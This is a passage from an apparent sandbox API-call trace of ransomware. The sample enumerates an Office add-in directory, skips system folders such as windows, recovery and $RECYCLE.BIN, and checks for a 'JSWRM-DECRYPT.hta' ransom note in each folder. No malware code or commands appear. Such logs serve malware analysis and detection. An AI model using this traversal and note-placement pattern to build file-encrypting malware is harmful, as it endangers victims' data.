Size=0x14e) returned 0x21c578 [0123.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\jswrm-decrypt.hta")) returned 0x20 [0123.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.286] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4025959e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.286] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.286] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4025959e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.286] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.286] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.286] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4025959e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4025959e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4025959e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.286] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0123.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.287] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.287] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc34bb5b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.287] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0123.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0123.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0123.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.288] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.288] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0123.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244e58 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.289] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0822be8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0822be8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.289] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244e58 | out: hHeap=0x1e0000) returned 1 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.290] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0822be8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0822be8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.290] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.290] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="no", cAlternateFileName="")) returned 1 [0123.290] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0123.290] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0123.290] lstrcmpiW (lpString1="no", lpString2="...") returned 1 [0123.290] lstrcmpiW (lpString1="no", lpString2="windows") returned -1 [0123.290] lstrcmpiW (lpString1="no", lpString2="recovery") returned -1 [0123.290] lstrcmpiW (lpString1="no", lpString2="perflogs") returned -1 [0123.290] lstrcmpiW (lpString1="no", lpString2="documents and settings") returned 1 [0123.290] lstrcmpiW (lpString1="no", lpString2="$RECYCLE.BIN") returned 1 [0123.290] lstrcmpiW (lpString1="no", lpString2="system volume information") returned -1 [0123.290] lstrcmpiW (lpString1="no", lpString2="msocache") returned 1 [0123.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\jswrm-decrypt.hta")) returned 0xffffffff [0123.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0123.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0123.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.291] HeapFree (in: 